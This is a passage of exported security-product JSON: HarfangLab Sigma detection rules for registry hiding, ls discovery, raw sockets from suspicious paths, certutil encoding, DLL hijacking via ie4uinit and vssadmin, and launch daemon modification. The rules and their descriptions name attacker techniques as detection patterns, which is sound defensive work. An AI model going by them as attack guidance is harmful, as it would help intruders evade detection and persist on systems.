exclusion_acdsystems:\n Image|endswith: '\\ACDSee??.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ACD Systems International Inc'\n TargetObject|endswith: '\\SOFTWARE\\ACD Systems\\ACDSee\\\\*\\PrintOptions\\Presets\\PrintContactSheet\\Default\\strFtrText'\n\n exclusion_outlook:\n ProcessOriginalFileName: 'Outlook.exe'\n TargetObject:\n - 'HKU\\S-*\\SOFTWARE\\Microsoft\\Office\\\\*\\Outlook\\Profiles\\Outlook\\\\*\\Reply-Forward Signature'\n - 'HKU\\S-*\\SOFTWARE\\Microsoft\\Office\\\\*\\Outlook\\Profiles\\Outlook\\\\*\\New Signature'\n\n condition: selection 
and not 1 of exclusion_*\nlevel: high\n#level: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "01833e69-127a-4ff4-a998-d4decbae548f",
"rule_name": "Possible Hidden Registry Data Created",
"rule_description": "Detects an attempt to hide data in the Registry by adding multiple spaces at the beginning of a value.\nAdversaries often manipulate the Windows Registry by adding spaces to obscure data, hide configurations, or remove evidence.\nIt is recommended to investigate the source of the registry modification, and check for related events that may indicate unauthorized access or malicious activity.\n",
"rule_creation_date": "2021-10-08",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "01ce3d93-1705-4c9f-a0f9-4c0e16af130b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613285Z",
"creation_date": "2026-03-23T11:45:34.613289Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613296Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1083/",
"https://attack.mitre.org/techniques/T1005/"
],
"name": "t1083_recursive_ls_linux.yml",
"content": "title: File and Directory Discovered via ls\nid: 01ce3d93-1705-4c9f-a0f9-4c0e16af130b\ndescription: |\n Detects the execution of ls with special arguments that may be used for file and directory discovery.\n Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1083/\n - https://attack.mitre.org/techniques/T1005/\ndate: 2022/12/01\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1083\n - attack.t1005\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/ls'\n\n # When the agent is under a lot of pressure, the parent information of a process can be missing.\n # Exceptionally for this rule, because it triggers so frequently with a low severity, we will ignore\n # its instances where the parent is missing.\n # When the parent is missing, the ParentImage or ParentCommandLine field is also missing (it is not empty or null)\n # so we can't easily match against that.\n # Instead, we reverse the problem by requiring the ParentImage field to contain a `\\`.\n ParentImage|contains: '\\'\n\n selection_recursive:\n CommandLine|contains:\n - ' -R'\n - ' -?R'\n - ' -??R'\n - ' -???R'\n - ' -????R'\n - ' -?????R'\n\n selection_arg_all:\n CommandLine|contains:\n - ' -a'\n - ' -?a'\n - ' -??a'\n - ' -???a'\n - ' -????a'\n - ' -?????a'\n selection_arg_l:\n CommandLine|contains:\n - ' -l'\n - ' -?l'\n - ' -??l'\n - ' -???l'\n - ' -????l'\n - ' -?????l'\n\n exclusion_commandline:\n CommandLine:\n - '* --color=auto *'\n - 'ls --color=auto'\n - '* --color=tty *'\n - 'ls --color=tty'\n - 'ls --color -d .'\n - 'ls -? /proc/*'\n - 'ls -?? /proc/*'\n - 'ls -? /usr/*'\n - 'ls -? /var/*'\n - 'ls -?? /var/*'\n - 'ls -?? /run/*'\n - '/bin/ls -? /proc/*'\n - '/bin/ls -?? /proc/*'\n - '/bin/ls -? /usr/*'\n - '/bin/ls -? /var/*'\n - '/bin/ls -?? /var/*'\n - '/bin/ls -ld /run/*'\n - 'ls -l libreoffice'\n - '/bin/ls -l ./jre/bin/java'\n\n exclusion_qualys1:\n - GrandparentImage: '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - CommandLine:\n - '*/qualys/cloud-agent/*'\n - 'ls -ltr /var/log/qualys/*'\n exclusion_qualys2:\n CommandLine: 'ls -ld /root'\n ParentImage: '/usr/bin/bash'\n GrandparentImage: '/usr/bin/bash'\n exclusion_qualys3:\n GrandparentImage: '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n CommandLine|startswith: 'ls -ld /root/'\n\n exclusion_bladelogic:\n ParentImage: '/opt/bmc/bladelogic/RSCD/bin/rscd_full'\n\n exclusion_ransomguard:\n CommandLine: 'ls -ld /root/.ransomguard.???'\n\n condition: selection and selection_recursive and 1 of selection_arg_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "01ce3d93-1705-4c9f-a0f9-4c0e16af130b",
"rule_name": "File and Directory Discovered via ls",
"rule_description": "Detects the execution of ls with special arguments that may be used for file and directory discovery.\nAdversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2025-01-28",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1005",
"attack.t1083"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "01cf0e26-1674-4236-aa42-024891c8915c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085708Z",
"creation_date": "2026-03-23T11:45:34.085710Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085714Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
"https://man7.org/linux/man-pages/man7/raw.7.html",
"https://man7.org/linux/man-pages/man7/packet.7.html",
"https://attack.mitre.org/techniques/T1095/",
"https://attack.mitre.org/techniques/T1040/"
],
"name": "t1095_rawsocket_suspicious_path.yml",
"content": "title: Raw Socket Created From Suspicious Path\nid: 01cf0e26-1674-4236-aa42-024891c8915c\ndescription: |\n Detects the creation of a raw socket from a suspicious path.\n Raw sockets are a special kind of socket that allow deep manipulation of network packets, either for inspection, filtering, custom protocols or packet forging.\n It may hint at a malware trying to hide its traffic without having to open a port or using a custom protocol to communicate with its C2.\n It is recommended to ensure the process who created this raw socket had a legitimate reason to do so and that the host wasn't compromised.\nreferences:\n - https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/\n - https://man7.org/linux/man-pages/man7/raw.7.html\n - https://man7.org/linux/man-pages/man7/packet.7.html\n - https://attack.mitre.org/techniques/T1095/\n - https://attack.mitre.org/techniques/T1040/\ndate: 2024/02/02\nmodified: 2026/02/25\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1095\n - attack.defense_evasion\n - attack.persistence\n - attack.t1205.001\n - attack.t1572\n - attack.credential_access\n - attack.discovery\n - attack.t1040\n - classification.Linux.Source.NetworkActivity\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: network_rawsocket\n product: linux\ndetection:\n\n selection:\n # Ensure that events without a process do not trigger this rule.\n # This happens typically when the agent is overloaded.\n ProcessImage|startswith:\n - '/'\n - 'memfd:'\n ProcessAncestors|contains: '?'\n\n # Filter common \"good\" directories to only retain the suspicious ones (/home, /tmp, /run, etc.)\n filter_system_directories:\n ProcessImage|startswith:\n - '/bin/'\n - '/sbin/'\n - '/usr/bin/'\n - '/usr/sbin/'\n - '/usr/local/'\n - '/opt/'\n - '/lib/'\n - '/lib64/'\n - '/usr/lib/'\n - '/usr/lib64/'\n - '/usr/libexec/'\n - '/usr/share/'\n - '/snap/'\n 
- '/var/lib/snapd/snap/'\n - '/nix/store/*/bin/'\n - '/nix/store/*/libexec/'\n\n exclusion_k3s:\n ProcessImage|startswith: '/var/lib/rancher/k3s/data/*/bin/'\n\n exclusion_container:\n - ProcessParentImage:\n - '/usr/bin/containerd-shim-runc-v2'\n - '/opt/containerd/bin/containerd-shim-runc-v2'\n - '/usr/local/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/opt/containerd/bin/containerd-shim-runc-v2|'\n - '|/usr/local/bin/containerd-shim-runc-v2|'\n\n exclusion_u01:\n ProcessImage:\n - '/u01/app/*/bin/cping'\n - '/u01/app/*/bin/acquisition'\n - '/u01/app/*/bin/gyrophare'\n - '/u01/app/*/bin/orarootagent.bin'\n\n exclusion_tina:\n ProcessImage:\n - '*/tina/Bin/.tina_ping.real'\n - '/usr/Atempo/tina/Bin/*'\n - '/usr/Atempo/TimeNavigator/*'\n\n exclusion_devolonetsv:\n # /var/lib/devolonetsvc/updates/firmware/devolo-firmware-qca7420/avupdate\n ProcessImage: '/var/lib/devolonetsvc/updates/firmware/devolo-firmware-*/avupdate'\n\n exclusion_openprocess:\n ProcessImage: '/usr/openprocess/*/bin/ops?server'\n\n exclusion_hlab:\n ProcessImage|endswith: '/hl-ebpf-sweeper'\n\n exclusion_lacework_datacollector:\n # /var/lib/lacework/6.11.0.21858/datacollector\n # /var/lib/lacework/6.7.6.19823/datacollector\n ProcessImage: '/var/lib/lacework/*/datacollector'\n\n exclusion_azure_networkwatcher:\n # /var/lib/waagent/Microsoft.Azure.NetworkWatcher.NetworkWatcherAgentLinux-1.4.3320.1/amd64/NetworkWatcherAgent\n ProcessImage: '/var/lib/waagent/Microsoft.Azure.NetworkWatcher.NetworkWatcherAgentLinux-*/*/NetworkWatcherAgent'\n\n exclusion_ibm_hsm:\n ProcessImage:\n - '/usr/lpp/mmfs/bin/mmcmi'\n - '/usr/lpp/mmfs/bin/mmfsd'\n - '/usr/lpp/mmfs/libexec/ctdb/ctdb_killtcp'\n\n exclusion_veritas:\n ProcessImage:\n - '/usr/openv/volmgr/bin/avrd'\n - '/usr/openv/volmgr/bin/tldd'\n\n exclusion_nexpose_vulnscanner:\n ProcessCurrentDirectory: '/data/rapid7/nexpose/nsc/'\n\n exclusion_container_iptables:\n ProcessAncestors|contains: 
'/usr/bin/containerd'\n ProcessCommandLine:\n - '/system/bin/ip6tables-restore --noflush -w -v'\n - '/system/bin/iptables-restore --noflush -w -v'\n\n exclusion_uv_python:\n ProcessImage|contains: '/.local/share/uv/python/'\n\n exclusion_cortex:\n ProcessCommandLine: '/opt/traps/bin/pmd'\n\n exclusion_sensugo:\n ProcessAncestors|contains:\n - '|/opt/sensugo/bin/sensu-agent.v*|'\n - '|/opt/sensugo/bin/sensu-backend.v*|'\n\n exclusion_zygote:\n ProcessParentImage: '/system/bin/app_process64'\n\n exclusion_icsscand:\n ProcessImage|endswith: '/icsscand/build/libicsneo-socketcan-daemon'\n\n exclusion_iptables:\n ProcessImage: '/system/bin/iptables'\n\n exclusion_zig_benchmark:\n ProcessCommandLine: 'zig-out/bin/benchmark'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "01cf0e26-1674-4236-aa42-024891c8915c",
"rule_name": "Raw Socket Created From Suspicious Path",
"rule_description": "Detects the creation of a raw socket from a suspicious path.\nRaw sockets are a special kind of socket that allow deep manipulation of network packets, either for inspection, filtering, custom protocols or packet forging.\nIt may hint at a malware trying to hide its traffic without having to open a port or using a custom protocol to communicate with its C2.\nIt is recommended to ensure the process who created this raw socket had a legitimate reason to do so and that the host wasn't compromised.\n",
"rule_creation_date": "2024-02-02",
"rule_modified_date": "2026-02-25",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.credential_access",
"attack.defense_evasion",
"attack.discovery",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1040",
"attack.t1095",
"attack.t1205.001",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "01f3ffc6-8407-4fda-972a-7d8066ec1e3b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078393Z",
"creation_date": "2026-03-23T11:45:34.078395Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078400Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
"https://attack.mitre.org/techniques/T1140/"
],
"name": "t1140_certutil_encoding_usage.yml",
"content": "title: Certutil Used for Encoding\nid: 01f3ffc6-8407-4fda-972a-7d8066ec1e3b\ndescription: |\n Detects the execution of certutil.exe to decode or encode data.\n This is often used by attackers to decode binaries hidden inside certificate files as Base64 or Hexadecimal information.\n It is recommended to check the content of the written file and the activity of the parent process for malicious behavior.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\n - https://attack.mitre.org/techniques/T1140/\ndate: 2021/05/27\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.s0160\n - attack.t1140\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Certutil\n - classification.Windows.Behavior.Obfuscation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\certutil.exe'\n # Renamed binaries\n - OriginalFileName: 'CertUtil.exe'\n\n selection_cmd:\n CommandLine|contains:\n # Decode to BASE64\n - ' -decode '\n - ' /decode '\n\n # Encode to BASE64\n - ' -encode '\n - ' /encode '\n\n # Decode from hexadecimal\n - ' -decodehex '\n - ' /decodehex '\n\n # Encode to hexadecimal\n - ' -encodehex '\n - ' /encodehex '\n\n exclusion_glpi1:\n # GLPI-Agent keystore-export\n CommandLine: 'certutil -encode *.crt temp.cer'\n # C:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe\n GrandparentImage|endswith: '\\glpi-agent.exe'\n\n exclusion_glpi2:\n # GLPI-Agent keystore-export\n CommandLine:\n - 'certutil -encode *.crt temp.cer'\n - 'certutil -encode *.crt temp.cer ?'\n # C:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe\n CurrentDirectory: '?:\\Program Files\\GLPI-Agent\\var\\keystore-export-*\\'\n\n exclusion_pfu_scansnap:\n ProcessGrandparentImage:\n - '?:\\Program Files (x86)\\PFU\\ScanSnap\\Home\\SshRegister.exe'\n - '?:\\Program Files 
(x86)\\PFU\\ScanSnap\\Driver\\PfuSsMon.exe'\n ProcessCommandLine: 'certutil -encodehex -f * content.json 1'\n\n exclusion_centralstage:\n ProcessGrandparentImage: '?:\\ProgramData\\CentraStage\\AEMAgent\\AEMAgent.exe'\n ProcessCommandLine: 'certutil -decode getsignatureinfo.base64 getsignatureinfo.ps1'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "01f3ffc6-8407-4fda-972a-7d8066ec1e3b",
"rule_name": "Certutil Used for Encoding",
"rule_description": "Detects the execution of certutil.exe to decode or encode data.\nThis is often used by attackers to decode binaries hidden inside certificate files as Base64 or Hexadecimal information.\nIt is recommended to check the content of the written file and the activity of the parent process for malicious behavior.\n",
"rule_creation_date": "2021-05-27",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1140"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "022246ff-42f6-4d06-8173-3c88a407926a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592360Z",
"creation_date": "2026-03-23T11:45:34.592363Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592371Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ie4uinit.yml",
"content": "title: DLL Hijacking via ie4uinit.exe\nid: 022246ff-42f6-4d06-8173-3c88a407926a\ndescription: |\n Detects potential Windows DLL Hijacking via ie4uinit.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ie4uinit.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\IEADVPACK.dll'\n - '\\iedkcs32.dll'\n - '\\MLANG.dll'\n - '\\netapi32.dll'\n - '\\netutils.dll'\n - '\\urlmon.dll'\n - '\\WININET.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "022246ff-42f6-4d06-8173-3c88a407926a",
"rule_name": "DLL Hijacking via ie4uinit.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ie4uinit.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0247bb14-5962-4133-9181-cb2f419787f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093612Z",
"creation_date": "2026-03-23T11:45:34.093614Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093619Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/004/"
],
"name": "t1543_004_launch_daemons_modified.yml",
"content": "title: Launch Daemon Modified\nid: 0247bb14-5962-4133-9181-cb2f419787f1\ndescription: |\n Detects a modification of a launch daemon.\n Adversaries may modify existing launch daemons in order to install a backdoor.\n It is recommended to check if the process making the modification has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1543/004/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.004\n - attack.defense_evasion\n - attack.t1647\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define the minimum version for each branch\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_process:\n ProcessImage|contains: '?'\n\n selection_kind_write:\n Kind: 'write'\n Path|startswith:\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n\n selection_kind_rename:\n Kind: 'rename'\n TargetPath|startswith:\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n\n filter_nosync:\n Path|contains: '.dat.nosync'\n\n filter_ds_store:\n Path|endswith: '/.DS_Store'\n\n exclusion_vim:\n Image: '/usr/bin/vim'\n\n exclusion_jamf:\n - Image: '/usr/local/jamf/bin/jamf'\n - ProcessGrandparentImage: '/usr/local/jamf/bin/jamf'\n - ProcessGrandparentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_installer:\n - ProcessCommandLine|startswith:\n - '/bin/bash /tmp/PKInstallSandbox.??????/'\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/scripts/'\n - ProcessParentCommandLine|startswith:\n - '/bin/bash /tmp/PKInstallSandbox.??????/'\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/scripts/'\n\n # used by a lot of installers\n exclusion_cp:\n Image: '/bin/cp'\n\n exclusion_bomgar:\n ProcessCommandLine|startswith:\n - '/bin/bash /Library/LaunchDaemons/.com.bomgar.bomgar-ps-*/mac_service_helper.sh'\n - '/Library/LaunchDaemons/.com.bomgar.bomgar-ps-*.helper/run.state'\n\n exclusion_desktop_services_priv:\n ProcessCommandLine:\n - '/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper'\n - '/system/library/privateframeworks/desktopservicespriv.framework/versions/a/resources/desktopserviceshelper'\n\n exclusion_finder:\n Image: '/system/library/coreservices/finder.app/contents/macos/finder'\n\n exclusion_common_folders:\n ProcessImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n\n exclusion_eset:\n ProcessGrandparentImage: '/Applications/ESET Endpoint Security.app/Contents/MacOS/execd'\n\n exclusion_rsync:\n Image: '/usr/bin/rsync'\n\n condition: selection_version and selection_process and 1 of selection_kind_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0247bb14-5962-4133-9181-cb2f419787f1",
"rule_name": "Launch Daemon Modified",
"rule_description": "Detects a modification of a launch daemon.\nAdversaries may modify existing launch daemons in order to install a backdoor.\nIt is recommended to check if the process making the modification has legitimate reasons to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.004",
"attack.t1647"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "027c5f6b-cba7-426c-af04-233b87967507",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593375Z",
"creation_date": "2026-03-23T11:45:34.593378Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593386Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vssadmin.yml",
"content": "title: DLL Hijacking via vssadmin.exe\nid: 027c5f6b-cba7-426c-af04-233b87967507\ndescription: |\n Detects potential Windows DLL Hijacking via vssadmin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - 